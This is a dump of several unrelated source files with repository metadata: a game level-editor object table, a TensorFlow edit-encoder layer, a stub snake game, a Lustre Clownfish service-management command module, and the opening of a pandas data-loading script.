'Pos': Point3(-17.024000000000001, 21.042999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/prop_group01' } },
'1167175832.07kmuller': {
'Type': 'Prop_Groups',
'DisableCollision': False,
'Holiday': '',
'Hpr': VBase3(11.423999999999999, 0.0, 0.0),
'Pos': Point3(15.657, -24.34, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Model': 'models/props/prop_group03' } },
'1167770798.99kmuller': {
'Type': 'Interior_furnishings',
'DisableCollision': True,
'Hpr': VBase3(90.596999999999994, 0.0, 0.0),
'Pos': Point3(-18.004999999999999, -7.1600000000000001, 0.0),
'Scale': VBase3(1.208, 1.208, 1.208),
'Visual': {
'Model': 'models/props/stove_potbelly' } },
'1167770993.8kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(-19.701000000000001, 51.665999999999997, -47.698),
'Pos': Point3(12.074999999999999, 19.867000000000001, 4.0519999999999996),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/bottle_brown' } },
'1167969614.23kmuller': {
'Type': 'Pan',
'DisableCollision': False,
'Hpr': VBase3(42.484000000000002, 0.0, 0.0),
'Pos': Point3(-17.777000000000001, -7.2249999999999996, 4.0910000000000002),
'Scale': VBase3(1.2150000000000001, 1.2150000000000001, 1.2150000000000001),
'Visual': {
'Model': 'models/props/pan' } },
'1167969727.94kmuller': {
'Type': 'Light_Fixtures',
'DisableCollision': False,
'Hpr': VBase3(-33.240000000000002, 0.0, 0.0),
'Pos': Point3(8.5879999999999992, -11.577999999999999, 2.9980000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/candle_holder' } },
'1167969766.85kmuller': {
'Type': 'Bucket',
'DisableCollision': True,
'Hpr': VBase3(40.520000000000003, 0.0, 0.0),
'Pos': Point3(-7.7670000000000003, 8.0640000000000001, 0.5),
'Scale': VBase3(0.61299999999999999, 0.61299999999999999, 0.61299999999999999),
'Visual': {
'Model': 'models/props/washtub' } },
'1167969844.67kmuller': {
'Type': 'Baskets',
'DisableCollision': True,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-14.246, 8.3949999999999996, 2.8090000000000002),
'Scale': VBase3(0.65500000000000003, 0.65500000000000003, 0.65500000000000003),
'Visual': {
'Color': (0.49000000953674316, 0.47999998927116394, 0.40000000596046448, 1.0),
'Model': 'models/props/basket_rope' } },
'1167969891.2kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-16.702999999999999, 8.2680000000000007, 4.0750000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/winebottle_B' } },
'1167969900.36kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(-70.304000000000002, 0.0, 0.0),
'Pos': Point3(-17.273, 7.7249999999999996, 4.0860000000000003),
'Scale': VBase3(1.1819999999999999, 1.1819999999999999, 1.1819999999999999),
'Visual': {
'Color': (0.69999998807907104, 0.69999998807907104, 0.69999998807907104, 1.0),
'Model': 'models/props/winebottle_B' } },
'1167969936.27kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-13.481999999999999, 8.4640000000000004, 6.0469999999999997),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/waterpitcher' } },
'1167969971.92kmuller': {
'Type': 'Sack',
'DisableCollision': True,
'Hpr': VBase3(0.0, 0.0, -5.008),
'Pos': Point3(-4.3079999999999998, 7.3250000000000002, 4.226),
'Scale': VBase3(0.40600000000000003, 0.40600000000000003, 0.40600000000000003),
'Visual': {
'Color': (0.80000001192092896, 0.79000002145767212, 0.82999998331069946, 1.0),
'Model': 'models/props/Sack' } },
'1174672543.93dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '83.4091',
'DropOff': '2.7273',
'FlickRate': 0.5,
'Flickering': True,
'Hpr': VBase3(-7.9450000000000003, -56.476999999999997, -1.736),
'Intensity': '1.0909',
'LightType': 'SPOT',
'Pos': Point3(-2.3029999999999999, -27.916, 22.664000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000001192092896, 0.87450981140136719, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1174672701.77dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '60.0000',
'DropOff': '0.0000',
'FlickRate': 0.5,
'Flickering': True,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Intensity': '0.3333',
'LightType': 'AMBIENT',
'Pos': Point3(0.39800000000000002, 2.3340000000000001, 8.8859999999999992),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.8399999737739563, 0.69999998807907104, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1176338996.15dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '60.0000',
'DropOff': '31.3636',
'FlickRate': 0.5,
'Flickering': False,
'Hpr': VBase3(92.483000000000004, -35.319000000000003, -33.607999999999997),
'Intensity': '1.1818',
'LightType': 'SPOT',
'Pos': Point3(19.262, 10.798, 11.169),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.87000000476837158, 1.0, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1176339347.32dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '83.4091',
'DropOff': '16.3636',
'FlickRate': 0.5,
'Flickering': True,
'Hpr': VBase3(-179.58199999999999, -53.234999999999999, -173.87799999999999),
'Intensity': '0.7273',
'LightType': 'SPOT',
'Pos': Point3(-7.6029999999999998, 31.085999999999999, 18.887),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000001192092896, 0.87450981140136719, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1185393793.62kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(62.180999999999997, 0.0, 0.0),
'Pos': Point3(-11.994999999999999, 22.491, -0.98999999999999999),
'Scale': VBase3(1.841, 1.841, 1.841),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185393885.79kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(-108.55200000000001, 0.0, 0.0),
'Pos': Point3(1.8320000000000001, 29.898, 0.0),
'Scale': VBase3(0.81499999999999995, 1.0, 1.9670000000000001),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185393954.26kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(-41.901000000000003, 0.0, 0.0),
'Pos': Point3(2.3290000000000002, 24.433, -0.021999999999999999),
'Scale': VBase3(0.48699999999999999, 1.0, 1.925),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185394014.06kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(20.408999999999999, 16.792000000000002, -0.66400000000000003),
'Scale': VBase3(0.625, 1.0, 1.7230000000000001),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185394041.0kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(-107.83, 0.0, 0.0),
'Pos': Point3(11.029999999999999, -29.952999999999999, -0.96499999999999997),
'Scale': VBase3(0.32900000000000001, 1.0, 1.401),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185394121.67kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(91.0, 0.0, 0.0),
'Pos': Point3(-13.568, -29.367000000000001, -0.27800000000000002),
'Scale': VBase3(0.251, 1.0, 1.623),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185396291.79kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-11.884, 7.9909999999999997, -0.312),
'Scale': VBase3(3.5219999999999998, 0.56599999999999995, 1.673),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube' } },
'1185396373.0kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-18.986000000000001, -7.1040000000000001, -0.41299999999999998),
'Scale': VBase3(1.0, 0.54500000000000004, 2.004),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube' } },
'1205366897.45kmuller': {
'Type': 'Door Locator Node',
'Name': 'door_locator',
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(0.047, -29.861000000000001, 0.067000000000000004),
'Scale': VBase3(1.0, 1.0, 1.0) },
'1205366965.03kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(4.3879999999999999, 0.0, 0.0),
'Pos': Point3(-18.806999999999999, 14.321, -1.6910000000000001),
'Scale': VBase3(0.53200000000000003, 1.0, 1.986),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1228170354.34kmuller': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(39.548000000000002, 0.0, 0.0),
'Pos': Point3(6.8310000000000004, -12.913, 2.9590000000000001),
'Scale': VBase3(1.5600000000000001, 1.5600000000000001, 1.5600000000000001),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08' } },
'1228170436.83kmuller': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(39.548000000000002, 0.0, 0.0),
'Pos': Point3(7.0279999999999996, -8.2780000000000005, 2.9769999999999999),
'Scale': VBase3(0.96399999999999997, 0.96399999999999997, 0.96399999999999997),
'VisSize': '',
'Visual': {
'Color': (0.60000002384185791, 0.80000001192092896, 1.0, 1.0),
'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08' } },
'1228170440.53kmuller': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(-6.5620000000000003, 0.0, 0.0),
'Pos': Point3(6.6909999999999998, -9.6229999999999993, 2.9990000000000001),
'Scale': VBase3(1.2709999999999999, 1.0109999999999999, 1.0109999999999999),
'VisSize': '',
'Visual': {
'Color': (0.80000001192092896, 0.60000002384185791, 1.0, 1.0),
'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08' } },
'1257364092.45caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(178.923, 0.0, 0.0),
'Pos': Point3(-6.2439999999999998, -28.042999999999999, 7.9669999999999996),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08' } },
'1257364187.71caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(178.923, 0.0, 0.0),
'Pos': Point3(6.9470000000000001, -28.128, 7.9669999999999996),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08' } },
'1257796324.14caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(-180.0, 0.51400000000000001, 51.784999999999997),
'Pos': Point3(-7.5899999999999999, -28.423999999999999, 8.8989999999999991),
'Scale': VBase3(1.873, 1.873, 1.873),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } },
'1257796371.34caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(0.0, -0.0, 51.060000000000002),
'Pos': Point3(-4.7839999999999998, -28.463999999999999, 8.9420000000000002),
'Scale': VBase3(1.873, 1.873, 1.873),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } },
'1257796421.79caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(0.0, -0.0, 51.060000000000002),
'Pos': Point3(8.3450000000000006, -28.542000000000002, 8.5299999999999994),
'Scale': VBase3(1.7929999999999999, 1.7929999999999999, 1.7929999999999999),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } },
'1257796421.81caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(-180.0, 0.51400000000000001, 51.784999999999997),
'Pos': Point3(5.6589999999999998, -28.504000000000001, 8.4890000000000008),
'Scale': VBase3(1.7929999999999999, 1.7929999999999999, 1.7929999999999999),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } } },
'Visual': {
'Model': 'models/buildings/interior_shanty_npc_house' } } },
'Node Links': [],
'Layers': { },
'ObjectIds': {
'1156371286.47luzd0': '["Objects"]["1156371286.47luzd0"]',
'1165344228.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344228.45kmuller"]',
'1165344265.72kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344265.72kmuller"]',
'1165344324.52kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344324.52kmuller"]',
'1165344340.36kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344340.36kmuller"]',
'1165344362.31kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344362.31kmuller"]',
'1165344408.19kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344408.19kmuller"]',
'1165344472.14kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344472.14kmuller"]',
'1165344556.34kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344556.34kmuller"]',
'1165344597.42kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344597.42kmuller"]',
'1165344630.91kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344630.91kmuller"]',
'1165344741.81kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344741.81kmuller"]',
'1165344792.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344792.45kmuller"]',
'1165344875.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344875.45kmuller"]',
'1165344934.56kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344934.56kmuller"]',
'1165345171.86kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345171.86kmuller"]',
'1165345203.69kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345203.69kmuller"]',
'1165345305.27kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345305.27kmuller"]',
'1165345386.11kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345386.11kmuller"]',
'1166055721.46kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1166055721.46kmuller"]',
'1166055838.34kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1166055838.34kmuller"]',
'1166056045.98kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1166056045.98kmuller"]',
'1167156249.03kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156249.03kmuller"]',
'1167156430.64kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156430.64kmuller"]',
'1167156651.85kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156651.85kmuller"]',
'1167156680.76kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156680.76kmuller"]',
'1167156728.14kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156728.14kmuller"]',
'1167175789.09kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167175789.09kmuller"]',
'1167175832.07kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167175832.07kmuller"]',
'1167770798.99kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167770798.99kmuller"]',
'1167770993.8kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167770993.8kmuller"]',
'1167969614.23kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969614.23kmuller"]',
'1167969727.94kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969727.94kmuller"]',
'1167969766.85kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969766.85kmuller"]',
'1167969844.67kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969844.67kmuller"]',
'1167969891.2kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969891.2kmuller"]',
'1167969900.36kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969900.36kmuller"]',
'1167969936.27kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969936.27kmuller"]',
'1167969971.92kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969971.92kmuller"]',
'1174672543.93dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1174672543.93dzlu"]',
'1174672701.77dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1174672701.77dzlu"]',
'1176338996.15dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1176338996.15dzlu"]',
'1176339347.32dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1176339347.32dzlu"]',
'1185393793.62kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185393793.62kmuller"]',
'1185393885.79kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185393885.79kmuller"]',
'1185393954.26kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185393954.26kmuller"]',
'1185394014.06kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185394014.06kmuller"]',
'1185394041.0kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185394041.0kmuller"]',
'1185394121.67kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185394121.67kmuller"]',
'1185396291.79kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185396291.79kmuller"]',
'1185396373.0kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185396373.0kmuller"]',
'1205366897.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1205366897.45kmuller"]',
'1205366965.03kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1205366965.03kmuller"]',
'1228170354.34kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1228170354.34kmuller"]',
'1228170436.83kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1228170436.83kmuller"]',
'1228170440.53kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1228170440.53kmuller"]',
'1257364092.45caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257364092.45caoconno"]',
'1257364187.71caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257364187.71caoconno"]',
'1257796324.14caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796324.14caoconno"]',
'1257796371.34caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796371.34caoconno"]',
'1257796421.79caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796421.79caoconno"]',
'1257796421.81caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796421.81caoconno"]' } }
# Level-editor viewport state saved alongside the object data: camera
# position/orientation, lens focal length, sky preset (-1 appears to mean
# "none" -- TODO confirm against the editor), and fog toggle.
extraInfo = {
    'camPos': Point3(0, -14, 0),
    'camHpr': VBase3(0, 0, 0),
    'focalLength': 0.85276538133599999,
    'skyState': -1,
    'fog': 0 }
| [
"brandoncarden12345@gmail.com"
] | brandoncarden12345@gmail.com |
9da2c36775a99673d80810536059cc0b7380e907 | b0885fde23fff880927c3a6248c7b5a33df670f1 | /models/im_retrieval_transformer/edit_encoder.py | 0e4567075df31d82bd11666f71d482f72c5f7c10 | [] | no_license | mrsalehi/paraphrase-generation | ceb68200e9016c5f26036af565fafa2d736dc96b | 3e8bd36bd9416999b93ed8e8529bfdf83cf4dcdd | refs/heads/master | 2020-07-22T03:50:40.343595 | 2019-08-26T11:29:08 | 2019-08-26T11:29:08 | 207,065,580 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | import tensorflow as tf
from models.common import graph_utils, vocab
from models.common.config import Config
from models.im_all_transformer import edit_encoder
from models.im_all_transformer.edit_encoder import TransformerMicroEditExtractor, WordEmbeddingAccumulator
from models.im_all_transformer.transformer import model_utils
from models.im_all_transformer.transformer.embedding_layer import EmbeddingSharedWeights
OPS_NAME = 'edit_encoder'
class EditEncoderAcc(tf.layers.Layer):
    """Edit encoder that represents an edit as accumulated word embeddings.

    The edit vector is the concatenation of two halves: accumulated
    embeddings of the inserted words and of the common words. Each half
    is ``edit_dim // 2`` wide (set via ``config.accumulated_dim``).
    """

    def __init__(self, config, **kwargs):
        super().__init__(config, **kwargs)
        self.config = config
        # Each of the two accumulated halves occupies half of edit_dim.
        config.accumulated_dim = config.editor.edit_encoder.edit_dim // 2
        self.wa = WordEmbeddingAccumulator(config)

    # noinspection PyMethodOverriding
    def call(self, src_word_ids, tgt_word_ids,
             insert_word_ids, common_word_ids,
             src_len, tgt_len, iw_len, cw_len, **kwargs):
        with tf.variable_scope('edit_encoder'):
            orig_embedding_layer = EmbeddingSharedWeights.get_from_graph()
            wa_inserted = self.wa(orig_embedding_layer(insert_word_ids), iw_len)
            # Bug fix: the common-word accumulation must be masked by the
            # common-word lengths (cw_len); the original passed iw_len,
            # leaving the cw_len parameter entirely unused.
            wa_common = self.wa(orig_embedding_layer(common_word_ids), cw_len)

            edit_vector = tf.concat([wa_inserted, wa_common], axis=1)

            if self.config.editor.enable_dropout and self.config.editor.dropout > 0.:
                edit_vector = tf.nn.dropout(edit_vector, 1. - self.config.editor.dropout)

        # The two trailing tuples are placeholder attention/alignment
        # outputs kept for interface compatibility with other encoders.
        return edit_vector, (tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]])), \
               (tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]]))
| [
"ub.maka@gmail.com"
] | ub.maka@gmail.com |
6aaa0670890d94adae6318b188461250bd09151a | e601ff328271d102d6b38259129a588416279a3d | /Snek.py | 919628a5ef5b52837032d57a91758f83bef3c66f | [] | no_license | AlliterativeAnchovies/GameJamYamHam | 383c357adb2375cd7cf2f0cdd846e2824c4e69c1 | cba2c07098a7316d1b415c377151e8ba0902ecdf | refs/heads/master | 2021-05-07T01:27:46.474053 | 2017-11-13T16:55:29 | 2017-11-13T16:55:29 | 110,340,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py |
# Current head position of the snake as [x, y].
snekPosition = [0, 0]
# Body segments of the snake (not yet populated anywhere).
snekParts = []


def moveSnek(x, y):
    """Translate the snake's position in place by (x, y)."""
    for axis, delta in enumerate((x, y)):
        snekPosition[axis] += delta
def changeSnekSizeBy(count):
if count > 0:
pass
#snekParts.extend([pass for i in range(count)]) | [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
cb66fb20161657cdfa2e432eef049a08fc5795c3 | b169439ff77e4df4730b1efa09b3f306fbcd979f | /pyclownfish/clownfish_subsystem_service.py | 8f90b175b024d8dc03a87c36ffc03cc8bfe4b7fe | [
"MIT"
] | permissive | KnightKu/clownfish | 76d85030411d520ba3fcd301a796505cbfb863e7 | fb9209e99a22caa84e4ce8a7afa23dce46b0104c | refs/heads/master | 2022-07-28T21:41:40.351343 | 2020-02-16T14:47:08 | 2020-02-16T14:47:08 | 259,587,234 | 0 | 0 | null | 2020-04-28T09:11:14 | 2020-04-28T09:11:13 | null | UTF-8 | Python | false | false | 5,966 | py | # Copyright (c) 2020 DataDirect Networks, Inc.
# All Rights Reserved.
# Author: lixi@ddn.com
"""
Subsystem of service
"""
from pyclownfish import clownfish_command_common
from pylcommon import lustre
SUBSYSTEM_SERVICE_COMMNAD_MOVE = "move"
SUBSYSTEM_SERVICE_NAME = "service"
SUBSYSTEM_SERVICE = clownfish_command_common.Subsystem(SUBSYSTEM_SERVICE_NAME)
def service_move_usage(log):
"""
Usage of moving service
"""
log.cl_stdout("""Usage: %s %s <service_name> <hostname>
service_name: a Lustre service name, e.g. fsname-OST000a""" %
(SUBSYSTEM_SERVICE_NAME,
SUBSYSTEM_SERVICE_COMMNAD_MOVE))
def service_move(connection, args):
"""
move the service(s)
"""
# pylint: disable=too-many-branches
log = connection.cc_command_log
if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
(clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
service_move_usage(log)
return 0
instance = connection.cc_instance
if len(args) != 2:
service_move_usage(log)
return -1
service_name = args[0]
hostname = args[1]
service = instance.ci_name2service(service_name)
if service is None:
log.cl_error("invalid service name [%s]", service_name)
return -1
found = False
for host in service.ls_hosts():
if host.sh_hostname == hostname:
found = True
break
if not found:
log.cl_error("service [%s] doesn't have any instance on host [%s]",
service_name, hostname)
return -1
if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
ret = service.ls_mount(log, hostname=hostname)
else:
ret = service.ls_lustre_fs.lf_mount_service(log, service, hostname=hostname)
return ret
def service_move_argument(connection, complete_status):
"""
Return argument that can be filesystem's service
"""
instance = connection.cc_instance
line = complete_status.ccs_line
line_finished = line[0:complete_status.ccs_begidx]
fields = line_finished.split()
field_number = len(fields)
# fields[0] and fields[1] should be "service" and "move"
if field_number < 2:
return []
elif field_number == 2:
candidates = []
for lustrefs in instance.ci_lustres.values():
for service in lustrefs.lf_service_dict.itervalues():
if service.ls_service_name not in candidates:
candidates.append(service.ls_service_name)
for mgs in instance.ci_mgs_dict.values():
if mgs.ls_service_name not in candidates:
candidates.append(mgs.ls_service_name)
return candidates
elif field_number == 3:
service = instance.ci_name2service(fields[2])
if service is None:
return []
candidates = []
for host in service.ls_hosts():
candidates.append(host.sh_hostname)
return candidates
else:
return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_MOVE, service_move)
COMMAND.cc_add_argument(service_move_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_MOVE] = COMMAND
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT = "umount"
def service_umount_usage(log):
"""
Usage of moving service
"""
log.cl_stdout("""Usage: %s %s <service_name>...
service_name: a Lustre service name, e.g. fsname-OST000a""" %
(SUBSYSTEM_SERVICE_NAME,
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT))
def service_umount(connection, args):
"""
umount the service(s)
"""
# pylint: disable=too-many-branches
log = connection.cc_command_log
if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
(clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
service_umount_usage(log)
return 0
instance = connection.cc_instance
for service_name in args:
service = instance.ci_name2service(service_name)
if service is None:
log.cl_stderr("service name [%s] is not configured in Clownfish", service_name)
return -1
if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
ret = service.ls_umount(log)
else:
ret = service.ls_lustre_fs.lf_umount_service(log, service)
if ret:
return ret
return ret
def service_umount_argument(connection, complete_status):
"""
Return argument that can be filesystem's service
"""
instance = connection.cc_instance
line = complete_status.ccs_line
line_finished = line[0:complete_status.ccs_begidx]
fields = line_finished.split()
field_number = len(fields)
# fields[0] and fields[1] should be "service" and "umount"
if field_number < 2:
return []
elif field_number == 2:
candidates = []
for lustrefs in instance.ci_lustres.values():
for service in lustrefs.lf_service_dict.itervalues():
if service.ls_service_name not in candidates:
candidates.append(service.ls_service_name)
for mgs in instance.ci_mgs_dict.values():
if mgs.ls_service_name not in candidates:
candidates.append(mgs.ls_service_name)
return candidates
elif field_number == 3:
service = instance.ci_name2service(fields[2])
if service is None:
return []
candidates = []
for host in service.ls_hosts():
candidates.append(host.sh_hostname)
return candidates
else:
return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_UMOUNT, service_umount)
COMMAND.cc_add_argument(service_umount_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_UMOUNT] = COMMAND
| [
"lixi@ddn.com"
] | lixi@ddn.com |
2773b3c2eb933aa1def2296c9be9cc09597c93b0 | 369e260e100db9ab5cc8b1711e99ef5e49aec173 | /data/dacon/comp1/dacon1_8_feature_importances.py | 63fbb471f1ea288e16cd5ce5ffd2e0ab4d5872ed | [] | no_license | HWALIMLEE/study | 7aa4c22cb9d7f7838634d984df96eed75f7aefea | 8336adc8999126258fe328d6b985a48e32667852 | refs/heads/master | 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,666 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
train=pd.read_csv('./data/dacon/comp1/train.csv',header=0,index_col=0) #0행이 header, 0열이 index/ header와 index모두 존재
test=pd.read_csv('./data/dacon/comp1/test.csv',header=0, index_col=0)
